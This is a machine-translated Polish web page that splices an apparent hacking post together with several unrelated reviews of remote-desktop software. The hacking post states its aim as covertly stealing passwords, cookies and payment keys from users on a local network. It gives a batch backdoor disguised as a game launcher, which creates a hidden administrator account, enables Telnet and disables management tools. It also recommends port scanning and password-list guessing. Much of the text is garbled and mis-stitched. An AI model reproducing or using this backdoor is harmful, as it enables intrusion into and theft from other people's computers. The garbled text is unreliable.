DZWONEK

Są tacy, którzy czytają te wiadomości przed tobą.
Subskrybuj, aby otrzymywać świeże artykuły.
E-mail
Imię
Nazwisko
Jak chcesz przeczytać Dzwon
Bez spamu
   zabawna brzana 2 lutego 2012 o 14:23

Najprostszy ukryty sposób dostępu do komputera z sieci domowej

Witam wszystkich, to mój pierwszy artykuł na temat Habré, więc nie oceniajcie ściśle. W tym poście opiszę, jak można uzyskać zdalny dostęp do komputera użytkownika w sieci lokalnej za pośrednictwem wiersza poleceń, omijając wszystkie programy antywirusowe i znając małą składnię wiersza poleceń systemu Windows. Ten artykuł jest przeznaczony do użytku tylko w systemie Windows XP, ale jeśli chcesz, możesz przepisać kod dla dowolnego innego systemu operacyjnego z rodziny Windows. Więc zacznijmy. Ogólnie artykuł jest napisany dla użytkowników na poziomie podstawowym. Głównym celem jest uzyskanie niezbędnych danych (haseł, wyglądu, letnich rezydencji, dostępu do skrzynek pocztowych, plików kluczy webmoney, plików cookie i innych ważnych łupieżów) i pozostawienie w spokoju, nie pozostawiając żadnych śladów penetracji. Więc zacznijmy, jestem w sieci lokalnej z około 5000 użytkowników, sieć ze statyką lub dhcp nie ma znaczenia, mam adres IP i jestem szczęśliwa. W sieci jest wiele podsieci, których trasy są zarejestrowane na serwerze. Adres MAC komputera jest zarejestrowany u administratora sieci, ponieważ w moim przypadku był to warunek połączenia z siecią, więc mój mak zaświeci się, jeśli coś się stanie. Aby uniknąć znalezienia, najpierw instalujemy maszynę wirtualną (używany VmWare 5.1), instalujemy na niej XP, skaner portów (używany SuperScan 3.00 można pobrać) i uruchamiamy usługę Telnet. Podłączamy maszynę wirtualną do sieci za pomocą NAT, a tym samym uzyskujemy zupełnie inny adres mac maszyny, która patrzy na sieć. Cały brzęczyk został zainstalowany, śmiało. Otwórz zwykły notatnik i napisz plik wsadowy o następującej treści:

   @ Wyłącz echo
   Użytkownik sieciowy Admin_Support lop / add\u003e nul
   Net localgroup netto localgroup
   Konta netto / maxpwage: nieograniczone\u003e nul sc config TlntSvr start \u003d auto\u003e nul
   Sc start TlntSvr\u003e nul
Reg dodaj „HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ Winlogon \\ SpecialAccounts \\ UserList” / v Wsparcie dla administratora / t REG_DWORD / d 0\u003e null
   Reg dodaj „HKCU \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ policy \\ System” / v DisableRegistryTools / t Reg_dword / d 1 / f\u003e nul Reg dodaj „HKCU \\ SOFTWARE \\ POLICIES \\ Microsoft \\ MMC” / v RestrictPemitSnapins / t Reg_dword / d 1 / f\u003e nul del% SestemRoot% \\ system32 \\ compmgmt.msc\u003e nul
  del Start_game.bat

Tagi: wirusy, hakowanie, bezpieczeństwo, bezpieczeństwo informacji

Dzisiaj wiele się mówi o włamywaniu się na komputery innych ludzi. Jednak zdaniem wielu ekspertów w tej dziedzinie bardziej słuszne byłoby powiedzenie nie „jak zhakować czyjś„ komputer ”, ale„ jak uzyskać do niego nieautoryzowany dostęp ”. W takim przypadku nie można mówić o żadnych destrukcyjnych działaniach. Spróbujmy rozważyć najprostsze metody, za pomocą których możesz rozwiązać problem, jak dostać się na czyjś „komputer”.

Fikcyjne uprzedzenia

Niestety dzisiaj wielu użytkowników zaczyna coraz bardziej obawiać się, że ich komputery mogą zostać zhakowane lub zhakowane. Szczerze mówiąc, to kompletny nonsens. Kogo potrzebujesz? Jest również jasne, kiedy jest przechowywany na komputerach lub serwerach. Wielu nie ma niechęci do korzystania z tego.

Domowe systemy komputerowe są zhakowane głównie przez chuligańskich amatorów, którzy po prostu nie mają nic do roboty. Czasami jednak są też tacy, którzy mogą ukraść hasła dostępu do stron lub kody kart bankowych (pod warunkiem, że są przechowywane w terminalu domowym w formie niezaszyfrowanej). Ale to rzadkość.

Zajmując się tym, jak dostać się do czyjegoś „komputera”, można powiedzieć (co dziwne, to brzmi), nawet dziecko może to zrobić, jeśli ma odpowiednie narzędzia i umiejętność korzystania z nich. Rozważ najbardziej prymitywne sposoby.

Jaka jest podstawa włamania się do „komputera”

W większości przypadków stosowana jest najprostsza, ale najbardziej skuteczna metoda. Zasadniczo sam problem, jak dostać się na czyjś „komputer”, sprowadza się tylko do uzyskania adresu IP terminala komputerowego i jednej z ofiar. Co najciekawsze, w większości przypadków wielu amatorów nie wybiera konkretnej osoby, a jedynie skanuje z góry określony zakres adresów IP podatnych systemów komputerowych, tylko w celu zainteresowania lub przetestowania swoich umiejętności.

Dlatego dla tych, którzy zbytnio boją się swoich danych, lepiej wcześniej zadbać o bezpieczeństwo, instalując odpowiednie oprogramowanie.

Korzystanie ze skanera zasobów współdzielonych

Zastanawiałeś się więc, jak zalogować się na czyimś komputerze. Na początek możesz skorzystać z jednej z najprostszych metod, która polega na użyciu narzędzia Shared Resource Scanner 6.2.

Przed rozpoczęciem pracy w (menu Uruchom), na przykład w systemie Windows XP, należy wpisać polecenie winipcfg, aby znaleźć własny adres IP. Pojawi się okno z twoim adresem. Trzeba o tym pamiętać.

Program Lamescan

Teraz kilka słów o innej metodzie, która pozwala nauczyć się, jak dostać się na czyjś „komputer”. Po pierwsze, program GUI 1.2 skanera VNC służy do obecności adresów IP z otwartym portem 4899 lub 3389.

Teraz w aplikacji Lamescan wprowadzamy niezbędne adresy i wybieramy hasło. Możesz pomyśleć o tym sam, możesz pobrać listę najczęściej używanych haseł z Internetu. Po znalezieniu dopasowania można się cieszyć.

Względy etyczne

Podsumowując, chcę zauważyć, że ten artykuł nie stanowi zachęty do działania. Jest to raczej ogólny materiał edukacyjny, który w żaden sposób nie szkodzi użytkownikom. A ci, którzy to zrobią, powinni pomyśleć o legalności takich działań i względach etycznych.

Jednoczesna praca na kilku komputerach, z których tylko jeden jest przed tobą, a reszta - nawet po drugiej stronie Ziemi - nie jest fantastyczna. Aby mieć tę cudowną okazję, wystarczy dostęp do Internetu i programów zdalnego sterowania na każdym komputerze.

Programy zdalnego sterowania to pomosty łączące komputer lub gadżet mobilny, który znajduje się przed tobą, z różnymi urządzeniami komputerowymi na całym świecie. Oczywiście, jeśli masz klucz, czyli hasło, które umożliwia zdalne połączenie z nimi.

Możliwości tego rodzaju programów są bardzo szerokie. Obejmuje to dostęp do zawartości dysków, uruchamianie zainstalowanych aplikacji, zmianę ustawień systemowych i przeglądanie działań użytkownika ... Krótko mówiąc, pozwalają one zrobić prawie wszystko na komputerze zdalnym, jak na komputerze lokalnym. Dzisiejszy artykuł zawiera przegląd sześciu darmowych programów do zdalnego sterowania komputerami z systemem Windows (i nie tylko), z których jeden jest częścią samego systemu operacyjnego.

Jeśli musisz ustanowić połączenie między dwoma komputerami lub komputerem PC a urządzeniem mobilnym, z których jeden (zdalny) działa pod kontrolą systemu Windows, a drugi z systemem Windows, iOS, Android lub Mac OS X, czasami możesz obejść się bez programów innych firm (jeśli jesteś zaangażowany w połączenie Tylko komputery z systemem Windows). Aplikacja systemowa „Pulpit zdalny” jest obecna we wszystkich wersjach „Windows”, począwszy od XP. Nie jest konieczne instalowanie tej samej wersji systemu operacyjnego na obu komputerach; można łatwo nawiązać połączenie, na przykład między Windows 10 a Windows 7.

Aplikacja Microsoft Remote Desktop na Androida i Apple jest dostępna do pobrania za darmo w Google Play i App Store.

Co jeszcze jest potrzebne do utworzenia połączenia:

  • Zezwolenie na dostęp zdalny - skonfigurowane na komputerze, który będziesz kontrolować z zewnątrz.
  • Konto z hasłem na komputerze zdalnym. Aby rozwiązać problemy administracyjne (instalowanie i odinstalowywanie programów, zmiana ustawień systemu itp.), Potrzebne jest konto z uprawnieniami administratora.
  • Podłącz oba komputery do Internetu lub znajdź je w tej samej sieci lokalnej.
  • Po stronie odbierającej znajduje się otwarty port TCP 3389 (domyślnie używany przez Pulpit zdalny).

Jak włączyć pozwolenie

Ta i dalsze instrukcje są pokazane na przykładzie Windows 10.

  • Kliknij prawym przyciskiem myszy ikonę „Ten komputer” na pulpicie. Otwórz „Właściwości”.

  • W oknie „System” kliknij „Ustawienia zdalnego dostępu” w panelu przejścia. W sekcji okna „Pulpit zdalny” zaznacz pole wyboru „Zezwalaj ...” (pole wyboru „Zezwalaj tylko na uwierzytelnione połączenia” najlepiej pozostawić niezaznaczone). Następnie kliknij „Wybór użytkownika”.

  • Aby dodać użytkownika, który będzie mógł się z Tobą połączyć zdalnie, kliknij Dodaj. W polu „Wprowadź nazwy” wpisz nazwę swojego konta na tym komputerze (nie zapomnij, musi to być hasło)! Kliknij „Sprawdź nazwy” i OK.

To kończy konfigurację.

Jak skonfigurować ustawienia połączenia

Poniższe czynności są wykonywane na komputerze, z którego nawiążemy połączenie zdalne.

  • Kliknij ikonę wyszukiwania na pasku zadań i zacznij pisać słowo „usunięte”. Wybieramy spośród znalezionych „Podłączanie pulpitu zdalnego”.

  • Domyślnie okno aplikacji otwiera się w trybie zminimalizowanym, w którym znajdują się tylko pola do wprowadzenia nazwy komputera i danych użytkownika. Aby uzyskać dostęp do wszystkich ustawień, kliknij strzałkę „Pokaż opcje”. U dołu pierwszej karty - „Ogólne” znajduje się przycisk do zapisywania parametrów połączenia do pliku. Jest to wygodne, gdy używasz różnych ustawień do łączenia się z różnymi komputerami.

  • Następna zakładka - „Ekran” pozwala zmienić właściwości obrazu ekranu komputera zdalnego na monitorze. W szczególności, aby zwiększyć lub zmniejszyć rozdzielczość, użyj kilku monitorów, zmień głębię kolorów.

  • Następnie skonfiguruj „Zasoby lokalne” - dźwięk ze zdalnego komputera, warunki korzystania ze skrótów klawiaturowych, dostęp do zdalnej drukarki i schowka.

  • Ustawienia karty Interakcja wpływają na szybkość połączenia i jakość demonstracji obrazu ze zdalnego urządzenia na monitorze.

  • Karta „Zaawansowane” umożliwia określenie działań zmierzających do pomyślnego uwierzytelnienia zdalnego komputera, a także ustawienie parametrów połączenia podczas łączenia przez bramę.

  • Aby rozpocząć sesję dostępu zdalnego, kliknij „Połącz”. W następnym oknie wprowadź hasło.

Po ustanowieniu połączenia sesja na komputerze bieżącego użytkownika zostanie zakończona, a kontrola przejdzie na Ciebie. Użytkownik zdalnego komputera nie będzie mógł zobaczyć swojego pulpitu, ponieważ zamiast niego na ekranie pojawi się wygaszacz ekranu.

Postępując zgodnie z tą instrukcją, możesz łatwo połączyć się z komputerem znajdującym się w tej samej sieci co Twoja. Jeśli urządzenia są podłączone do różnych sieci, musisz wprowadzić kilka dodatkowych ustawień.

Jak połączyć się ze zdalnym komputerem przez Internet

Istnieją 2 sposoby skonfigurowania połączenia pulpitu zdalnego Windows za pośrednictwem Internetu - poprzez utworzenie kanału VPN, aby urządzenia widziały się tak, jakby były w tej samej sieci lokalnej, oraz przez przekierowanie portu 3389 do sieci lokalnej i zmianę dynamicznego (zmiennego) adresu IP adresy zdalnego komputera na stałe (statyczne).

Istnieje wiele sposobów tworzenia kanałów VPN, ale ich opis zajmie dużo miejsca (ponadto wiele informacji na ten temat można łatwo znaleźć w sieci). Dlatego rozważmy na przykład jedno z prostych - używając własnych narzędzi Windows.

Jak utworzyć kanał VPN w systemie Windows

Na zdalnym komputerze, który będzie serwerem:


Następnie składnik Połączenia przychodzące pojawi się w folderze połączeń sieciowych, którym będzie serwer VPN. Aby połączenie nie było blokowane przez zaporę, nie zapomnij otworzyć portu TCP 1723 na urządzeniu. A jeśli serwer ma lokalny adres IP (zaczyna się od 10, 172.16 lub 192.168), port będzie musiał zostać przekierowany do sieci zewnętrznej. Jak to zrobić, przeczytaj poniżej.

Na komputerze klienckim (Windows 10) połączenie jest jeszcze łatwiejsze do skonfigurowania. Uruchom narzędzie „Ustawienia”, przejdź do sekcji „Sieci i Internet” -\u003e „VPN”. Kliknij Dodaj połączenie VPN.

W oknie opcji określ:

  • Usługodawca - Windows.
  • Nazwa połączenia jest dowolna.
  • Nazwa lub adres serwera - adres IP lub nazwa domeny wcześniej utworzonego serwera.
  • Typ VPN - wykrywaj automatycznie lub PPTP.
  • Typ danych, które należy wprowadzić, to login i hasło (jednego z kont, na które udzielono pozwolenia na dostęp). Aby nie wprowadzać tych danych przy każdym połączeniu, napisz je w odpowiednich polach poniżej i zaznacz pole wyboru „Pamiętaj”.


Przekazywanie portów na routerze i uzyskanie statycznego adresu IP

Przekierowywanie portów (przekazywanie) na różnych urządzeniach (routerach) odbywa się na swój sposób, ale ogólna zasada jest wszędzie taka sama. Zobaczmy, jak to się robi na przykładzie typowego routera domowego TP-Link.

Otwórz sekcję „Przekazywanie” i „Serwery wirtualne” w panelu administracyjnym routera. W prawej połowie okna kliknij przycisk „Dodaj”.

W oknie „Dodaj lub zmodyfikuj rekord” wprowadź następujące ustawienia:

  • Port usługi: 3389 (lub 1723, jeśli konfigurujesz VPN).
  • Port wewnętrzny jest taki sam.
  • Adres IP: adres komputera (sprawdź właściwości połączenia) lub nazwę domeny.
  • Protokół: TCP lub wszystkie.
  • Standardowy port usługi: nie można określić ani wybrać z listy PDP, a dla VPN - PPTP.

Jak ustawić zmienny adres IP na stały

Standardowy pakiet dostawców usług internetowych dla abonentów domowych z reguły zawiera tylko dynamiczny adres IP, który ciągle się zmienia. A przypisanie stałego adresu IP użytkownikowi zwykle kosztuje go zaokrągloną kwotę. Aby nie ponosić dodatkowych kosztów, istnieją usługi DDNS (dynamiczny DNS), których zadaniem jest przypisanie stałej nazwy domeny do urządzenia (komputera) ze zmieniającym się adresem sieciowym.

Wiele usług DDNS świadczy swoje usługi za darmo, ale są tacy, którzy pobierają za to niewielką opłatę abonamentową.

Poniżej znajduje się krótka lista darmowych DDNS, których możliwości w naszym zadaniu są więcej niż wystarczające.

Zasady korzystania z tych usług, jeśli się różnią, nie są znaczące: najpierw przeprowadzamy rejestrację konta, następnie potwierdzamy adres e-mail, a na koniec rejestrujemy nazwę domeny Twojego urządzenia i aktywujemy ją. Następnie komputer domowy będzie miał własną nazwę w Internecie, na przykład 111pc.ddns.net. Nazwę tę należy podać w ustawieniach połączenia zamiast adresu IP lub nazwy w sieci lokalnej.

Nawiasem mówiąc, niektóre routery obsługują tylko niewielką grupę dostawców DDNS, na przykład tylko najstarszy i najsłynniejszy DynDNS (teraz płatny) i brak adresu IP. Inne - takie jak Asus, mają własną usługę DDNS. Zainstalowanie alternatywnego oprogramowania DD-WRT na routerze pomaga usunąć ograniczenia.

Plusy i minusy korzystania z pulpitu zdalnego systemu Windows

Główną zaletą zastrzeżonego narzędzia Windows w porównaniu z programami innych firm jest brak serwerów pośrednich podczas połączenia, co oznacza zmniejszenie ryzyka wycieku danych. Ponadto narzędzie to ma wiele elastycznych ustawień i dzięki umiejętnemu podejściu może stać się „nie do zdobycia fortecą” i „rakietą kosmiczną”.

Inne zalety pulpitu Windows to brak potrzeby pobierania czegoś, ograniczenia czasu trwania sesji, liczby połączeń i za darmo.

Wady - trudność w skonfigurowaniu dostępu przez Internet, podatność na ataki Pass Hash.

Teamviewer

Zanim zaczniesz korzystać z usługi, musisz zarejestrować konto Google (użytkownicy urządzeń z Androidem już je mają) lub zalogować się do niego w przeglądarce Google Chrome.

Główne okno „Pulpitu Chrome” zawiera 2 sekcje:

  • Zdalne wsparcie. Zawiera opcje zarządzania jednorazowym połączeniem z innym komputerem i zapewnienia dostępu do twojego.
  • Moje komputery Ta sekcja zawiera maszyny, z którymi wcześniej ustanowiłeś komunikację i możesz szybko połączyć się z nimi za pomocą określonego kodu PIN.

Podczas pierwszej sesji komunikacyjnej z użyciem Pulpitu Chrome na komputerze zdalnym zostanie zainstalowany dodatkowy komponent (host), co zajmie 2-3 minuty. Gdy wszystko będzie gotowe, na ekranie pojawi się tajny kod. Po wprowadzeniu go w odpowiednim polu kliknij „Połączenie”.

Podobnie jak w TeamViewer, użytkownik zdalnego komputera będzie mógł zobaczyć wszystkie twoje działania na ekranie. Programy ukryte, na przykład dla dziecka, nie są odpowiednie.

- Bardzo proste i równie niezawodne narzędzie przeznaczone do zdalnego sterowania komputerami w systemie Windows i Linux. Jego głównymi zaletami są łatwość użycia, niezawodność, duża szybkość połączenia oraz fakt, że nie wymaga instalacji. Wady - przy braku wersji mobilnych (w celu nawiązania połączenia przez Android i iOS za pomocą tego programu nie działa) oraz fakt, że wiele programów antywirusowych uważa to za szkodliwe i próbuje je usunąć. Na szczęście tego ostatniego można łatwo uniknąć, dodając narzędzie do wyjątków.

Ammyy Admin obsługuje 2 sposoby nawiązania połączenia - według numeru ID i adresu IP. Drugi działa tylko w sieci lokalnej.

Okno narzędzia jest podzielone na 2 połowy - „Klient”, w którym znajdują się dane identyfikacyjne komputera i hasło, oraz „Operator” - z polami do wprowadzenia tych danych. Istnieje również przycisk połączenia.

Książka kontaktów i ustawienia programu, które są dość proste, są ukryte w menu Ammyy.

  - Kolejny kompaktowy przenośny program Windows, który wygląda podobnie do poprzedniego, ale z ciekawszym zestawem funkcji. Obsługuje 2 metody połączenia - według ID i IP oraz 3 tryby - pełną kontrolę, menedżer plików (przesyłanie plików) i wyświetlanie tylko ekranu zdalnego komputera.

Pozwala także zdefiniować kilka poziomów praw dostępu:

  • Używaj za pomocą klawiatury i myszy zdalnego operatora.
  • Synchronizacja schowka
  • Zmiana praw dostępu przez administratora itp.

Tryb „Tylko podgląd” może służyć do potajemnego monitorowania działań użytkowników zdalnych maszyn (dzieci, pracowników), których nie ma w podobnych produktach.

W głównym oknie AeroAdmin znajduje się przycisk do otwierania czatu e-mail (znajdujący się obok przycisku „Stop”). Czat ma na celu szybkie wysłanie wiadomości e-mail do operatora, na przykład z prośbą o pomoc. Ta funkcja jest wyjątkowa, ponieważ w programach analogowych jest tylko zwykły czat do wymiany wiadomości tekstowych. I zaczyna działać dopiero po nawiązaniu połączenia.

Niestety książka kontaktowa AeroAdmin nie jest natychmiast dostępna. Wymaga osobnej aktywacji - przez Facebook. I tylko członkowie tej sieci społecznościowej mogą z niego korzystać, ponieważ w celu uzyskania kodu aktywacyjnego programiści żądają linku do strony osobistej. Okazuje się, że ci, którym podobał się ten program, nie mogą się obejść bez rejestracji na Facebooku.

Inną funkcją AeroAdmin jest dopuszczalność bezpłatnego użytkowania nawet w celach komercyjnych, jeśli nie potrzebujesz dodatkowych funkcji (ciągłe połączenie, wiele równoległych sesji itp.), Dostępnych tylko w płatnych wersjach.

  - najnowsze narzędzie w dzisiejszej recenzji do zdalnego połączenia z komputerem z systemem Windows z innego komputera lub urządzenia mobilnego. Można go używać bez instalacji iz nim.

Podobnie jak jego poprzednicy, ma wiele unikalnych cech:

  • Najwyższa prędkość przesyłania zdjęć ze zdalnego urządzenia.
  • Najszybsze udostępnianie plików, nawet przy niskiej prędkości Internetu.
  • Obsługa jednoczesnego połączenia wielu zdalnych użytkowników. Możliwość współpracy nad jednym projektem (każdy użytkownik ma swój własny kursor).

Ponadto, podobnie jak inne programy tej klasy, AnyDesk zapewnia operatorowi pełny dostęp do funkcji zdalnej maszyny, jest bardzo łatwy do podłączenia (za pomocą identyfikatora i hasła) i niezawodnie chroni przesyłane dane.

Po przeczytaniu tytułu artykułu niektórzy z was zapewne zastanawiali się: „Dlaczego musisz kontrolować inny komputer przez Internet? Okazuje się, że jest to konieczne przede wszystkim potencjalnym czytelnikom mojego bloga - emerytom i manekinom.

Nie myśl, że chcę, żebyś się tego nauczył, aby przejąć kontrolę nad komputerem swojego sąsiada, którego pies wyrzuca cię z głowy z ciągłym szczekaniem i zaczyna robić z nim coś niesamowitego, przerażając go i jego psa. Oczywiście nie. I nawet bez jego wiedzy takie zarządzanie raczej nie odniesie sukcesu. Nie będę Cię intrygował, przejdę do tematu.

Dlaczego muszę kontrolować inny komputer przez Internet?

Oczywiście przede wszystkim, aby ktoś bardziej doświadczony i znał się na tym
  technologia komputerowa, na przykład twój przyjaciel lub krewny, który mieszka daleko od ciebie, może w razie potrzeby pomóc Ci rozwiązać zdalnie za pomocą komputera.

Tak, to nawet nie problem, wystarczy skonfigurować jakiś program lub pomóc wydać tę samą aplikację o paszport przez Internet. Lub inny przypadek: jesteś już doświadczonym użytkownikiem i musisz czasem oderwać się od laptopa „podróżnego”, aby spojrzeć na domowy komputer.

Przynajmniej w celu wydrukowania jakiegoś dokumentu, który jest tylko tam. Lub z jakiegoś powodu, ile? To tutaj musisz kontrolować inny, czyli komputer domowy przez Internet.

Lub weź przedsiębiorstwo, które ma własną sieć lokalną. Wyobraź sobie, jak będzie musiał działać administrator systemu, jeśli musisz gdzieś uruchomić program lub usunąć inny komputer z zawieszenia. A jeśli jest sto komputerów, a nie jeden, ale w różnych przypadkach? Tutaj musisz być sprinterem. A potem po pewnym czasie wymazujesz nogi w jednym miejscu. Mam nadzieję, że rozwiałem wasze wątpliwości co do bezużyteczności tej sprawy?

Zasada zdalnej administracji

Oczywiście nie są to rzeczy hakerów i różne trojany. Chociaż metody programów używanych do zdalnego sterowania komputerem przez Internet są bardzo podobne. Różnią się od wirusów tylko tym, że działają otwarcie i naturalnie, za obopólną zgodą właścicieli komputerów uczestniczących w tym procesie.

Składają się z dwóch części. Pierwszy to serwer, drugi to część klienta. Serwer jest zainstalowany na komputerze, który musi być kontrolowany, a część klienta na tym, z którego korzysta administrator. Pod tym względem zdalni administratorzy są bardzo podobni do trojanów. Ale cele, jak wiadomo, są zupełnie inne.

Łącząc się z komputerem, na którym jest zainstalowany ten serwer, możesz znać tylko jego adres IP, a także hasło, które należy ustawić, aby nikt nie mógł uzyskać do niego dostępu przez Internet. A potem ten sam „każdy” może pracować nad twoim „pomysłem” nie gorzej niż jakikolwiek trojan.

Wpływ rodzaju adresu IP i rozwiązywanie problemów

Jeśli masz statyczny adres IP, aby uzyskać dostęp do Internetu, nie będzie żadnych problemów. Ale jeśli jest statyczny, ale należy do sieci domu lub dzielnicy, a te z kolei mają dynamiczny (czyli zmieniający się od czasu do czasu) adres dostępu do Internetu, mogą już wystąpić trudności. Cóż, tylko jeśli nie jesteś członkiem żadnej sieci, ale przejdź do adresu dynamicznego - ten sam problem.

Ale te problemy można rozwiązać. Istnieją na przykład specjalne strony, takie jak No-Ip.com lub DynDNS.com, w których można się zarejestrować, zainstalować program - „aktualizator” i uzyskać za ich pośrednictwem stały adres: user.no-ip.com. To prawda, że \u200b\u200bte witryny są anglojęzyczne, ale w razie potrzeby jestem pewien, że można znaleźć także inne osoby i rosyjskojęzyczne.

To jest informacja, ale generalnie nie zawracałbym sobie tym głowy. Obecnie istnieje wiele gotowych programów, które za każdym razem podejmują całą tę pracę techniczną przy rejestracji bieżącego adresu na swoim serwerze i wskazują, pod którym adresem szukać komputera w Internecie.

Ale jeśli potrzebujesz statycznego adresu IP (na przykład potrzebuję go z wielu innych powodów), możesz to zrobić za pośrednictwem swojego dostawcy. Kto nie wie, dostawca jest dostawcą usług internetowych. W naszym mieście w Bashinformsvyaz połączenie kosztuje dziś 150 rubli., Opłata miesięczna wynosi 50 rubli. Zgadzam się, że nie ma tak dużej kwoty, nawet dla seniorów.

Funkcje po zdalnym połączeniu

Nie będę mówić o udogodnieniach, które pojawią się później. Zostało to powiedziane na samym początku, kiedy ustaliliśmy, po co to było. Jakie są konkretne możliwości bezpośrednio związane z zarządzaniem? Oto główne:

  • zobacz pulpit, a raczej kopię zdalnego komputera na ekranie;
  • przechwytuj w dowolnym momencie kontrolę przynajmniej klawiatury za pomocą myszy;
  • uruchom dowolne programy zainstalowane na zarządzanym komputerze i zainstaluj nowe, jeśli to konieczne;
  • otwórz i, jeśli to konieczne, zmodyfikuj pliki;
  • przesyłać pliki przez Internet do przodu i do tyłu;

Dzięki zdalnej administracji uzyskujemy pełną kontrolę nad innym komputerem przez Internet. Prawie nieograniczona kontrola. Oczywiście odbywa się to za pełną zgodą właściciela. Tylko w tym celu wymagana jest prędkość kanału komunikacyjnego co najmniej 256 Kb / s oraz specjalny program.

Programy do sterowania innym komputerem przez Internet

Do tych celów jest wystarczająco dużo programów, zarówno płatnych, jak i bezpłatnych. Wymienię najczęstsze i oczywiście bezpłatne:

  • LogMeIn Hamachi

      Umożliwia połączenie do 16 komputerów z różnych części planety w własną wirtualną sieć za pośrednictwem Internetu. Oprócz zarządzania istnieje wiele innych możliwości, aż do organizacji gier sieciowych;
  • Ultra vnc

      Może organizować zdalne sterowanie, nawet gdy wszystkie inne programy są bezsilne, ale dla początkujących ustawienia są bardzo skomplikowane i nie ma obsługi języka rosyjskiego; / li\u003e
  • Ammy

      Zewnętrznie program jest bardzo podobny do Team Viewer. Ale jego zasada działania jest zupełnie inna. Jest on powiązany ze sprzętem komputera i dlatego wystarczy raz zezwolić programowi o tym identyfikatorze na komputer, a w przyszłości będzie mógł się z nim połączyć bez żadnych żądań.
  • Team viever

    Przede wszystkim ten program jest dobry, ponieważ nie ma znaczenia, czy twój adres jest statyczny czy dynamiczny. Praca z nim, bez przesady, jest sto razy łatwiejsza niż w natywnym systemie Windows „Pomocy zdalnej”. Musimy tylko zainstalować program na komputerze, którego będziemy używać w tym procesie i utworzyć nasze konto w usłudze Team Viewer.

Zainstaluj Team Viever

Nie ma tu nic skomplikowanego, ale ponieważ mój blog jest skierowany przede wszystkim do seniorów i manekinów, przeanalizujemy go szczegółowo i zwrócimy uwagę na niektóre niuanse. W pierwszym oknie wybierz „Zainstaluj”:

Myślę, że w tej sprawie można zakończyć.

Powodzenia! Do zobaczenia wkrótce na stronach bloga PenserMen.

Dziś funkcja, taka jak sterowanie innym komputerem przez Internet, nie jest zaskakująca. Istnieje wiele bezpłatnych systemów zdalnego dostępu, które ułatwiają przesyłanie informacji między użytkownikami i wykonywanie różnych operacji na innym urządzeniu za pośrednictwem Internetu lub sieci lokalnej.


Ta funkcja jest szczególnie potrzebna, na przykład, gdy ktoś nie jest szczególnie zaznajomiony z ustawieniami systemu operacyjnego próbującymi zmienić ustawienia. Aby nie tracić czasu na wyjaśnianie, możesz łatwo i w ciągu kilku sekund samodzielnie ustawić niezbędne opcje. Takie narzędzia są teraz niezbędne do pracy zdalnej, na przykład nie można tracić czasu na podróż do biura, wykonywanie całej pracy z domu, bycie administratorem systemu i zarządzanie głównym komputerem z domowego komputera. Wszystkie dane będą dostępne w każdej chwili. Nie martw się o bezpieczeństwo - wszystkie informacje podlegają silnemu szyfrowaniu, wszystkie dane są przesyłane w trybie ściśle poufnym.  Takie narzędzia można również wykorzystać do komunikacji, oszczędzając pieniądze na komunikacji głosowej.

Istnieje wiele programów do sterowania innym komputerem, rozważ pięć najpopularniejszych, przeanalizuj go, zwróć uwagę na zalety i wady.

Ten program jest chyba najpopularniejszy wśród użytkowników i od dawna jest liderem. Zasadniczo jest coś - funkcjonalność jest naprawdę dobra. Narzędzie nie waży dużo, kołysze się szybko, jest własnością publiczną. Ponadto instalacja nie jest wymagana, możesz natychmiast uruchomić i uruchomić. W związku z tym interfejs i funkcje są dostępne nawet dla najbardziej niedoświadczonego użytkownika. Po uruchomieniu wyświetla się okno z identyfikatorem i hasłem tego komputera oraz okno do wprowadzania odpowiednich danych z innego urządzenia.

Aplikacja ma wiele zalet. Na przykład pozwala przesyłać pliki, rozmawiać w trybie czatu, wyświetlać ekran i wiele więcej. Możesz także ustawić tryb całodobowego dostępu do urządzenia, ta funkcja jest przydatna dla administratorów systemu. Warto zauważyć dość dużą prędkość, zdolność do pracy na wszystkich platformach mobilnych i systemach operacyjnych. Istnieje również wiele innych dodatkowych funkcji przydatnych przy zdalnym dostępie.

Oczywiście nie ma ucieczki przed wadami. Wymieniamy niektóre z nich. Najważniejsze jest to, że chociaż narzędzie jest ogólnodostępne, nie powinno być wykorzystywane do celów komercyjnych. Biorąc to pod uwagę, istnieje wiele trudności. Na przykład praca może zostać zablokowana, jeśli program oceni twoje działania jako komercyjne. Rozszerzenie funkcjonalne nie jest już darmowe. Ponadto nie można skonfigurować bezpłatnego dostępu przez całą dobę. Aby w pełni korzystać z aplikacji, będziesz musiał zapłacić, ale kwota nie jest tak mała.

Dlatego pomimo wszystkich zalet ta aplikacja nie zawsze nadaje się do długotrwałego użytkowania. Ale jeśli chcesz wykonać dowolną operację za pośrednictwem zdalnego dostępu, jest to idealne rozwiązanie.

Jeśli chcesz pracować przez długi okres, musisz zapłacić za pełną wersję lub być przygotowanym na to, że administrator przestanie z niej korzystać w dowolnym momencie.

Ostatnio TeamViewer był prawdopodobnie jedynym godnym tego rodzaju programem. Albo była tak reklamowana i promowana, że \u200b\u200bpo prostu przyćmiła wszystkich konkurentów. Jednak dziś na arenie są inne narzędzia, które nie są gorsze od poprzedniego, w niektórych aspektach nawet lepsze. Jeden taki Supremo.

Program praktycznie nie różni się od popularnego TeamViewera, jest taki sam łatwy w użyciu, ma prosty i zrozumiały interfejs, jest przenośny, nie wymaga instalacji i jest gotowy do rozpoczęcia pracy w dowolnym momencie. Aplikacja nie instaluje swoich usług. Dostępny jest tryb pełnoekranowy do wyświetlania obszaru roboczego na innym komputerze, czacie i innych funkcjach. Warto również zwrócić uwagę na szybkość - jest wyższa niż w poprzednim narzędziu - pliki są przesyłane szczególnie prosto i elegancko. Kolejną zaletą docenioną przez wielu użytkowników jest hasło składające się wyłącznie z cyfr, bez względu na to, jak dziwnie to może brzmieć. Niektórzy nawet porzucili popularnego konkurenta i właśnie z tego powodu przeszli na Supremo. Wyjaśniam. Aby kontrolować komputer innej osoby, musisz uzyskać hasło i przesłać je wraz z numerem identyfikacyjnym do innego użytkownika. (Algorytm jest taki sam w obu programach.) Różnica polega na tym, że TeamViewer generuje hasła z alfabetu łacińskiego i liczb, a Supremo jest ograniczone do liczb. Oczywiście od razu wydaje się, że nie jest to konieczne, ale ci, którzy stają w obliczu prób przekazania hasła starszym krewnym, uznają to za argument. Cyfry są znacznie łatwiejsze do dyktowania niż chwytliwe hasło. Zwłaszcza dla tych, którzy nie używają SMS-ów i nie rozróżniają na przykład liter „J” i „g”. I nie chodzi o inteligencję, ale o wiek.

